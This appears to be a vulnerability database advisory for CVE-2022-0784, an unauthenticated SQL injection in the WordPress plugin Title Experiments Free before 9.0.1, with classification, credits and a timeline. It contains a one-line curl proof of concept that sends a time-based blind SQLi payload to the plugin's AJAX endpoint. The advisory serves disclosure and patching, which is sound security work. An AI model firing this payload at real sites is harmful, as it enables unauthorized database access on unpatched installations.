WordPress Plugin Vulnerabilities

Title Experiments Free < 9.0.1 - Unauthenticated SQLi

Description

The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the wpex_titles AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=wpex_titles&id[]=1 AND (SELECT 321 FROM (SELECT(SLEEP(5)))je)'

Affects Plugins

Plugin icon
wp-experiments-free
Fixed in 9.0.1

References

CVE
CVE-2022-0784

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified
Yes
WPVDB ID
6672b59f-14bc-4a22-9e0b-fcab4e01d97f

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2020-12-09
Title
DiveBook <= 1.1.4 - Unauthenticated SQL Injection
Published
2014-12-03
Title
Google Document Embedder <= 2.5.16 - SQL Injection
Published
2014-08-01
Title
RLSWordPressSearch - register.php agentid Parameter SQL Injection
Published
2014-08-01
Title
Wysija Newsletters 2.2 - SQL Injection
Published
2022-03-07
Title
Wow Countdowns <= 3.1.2 - Admin+ SQLi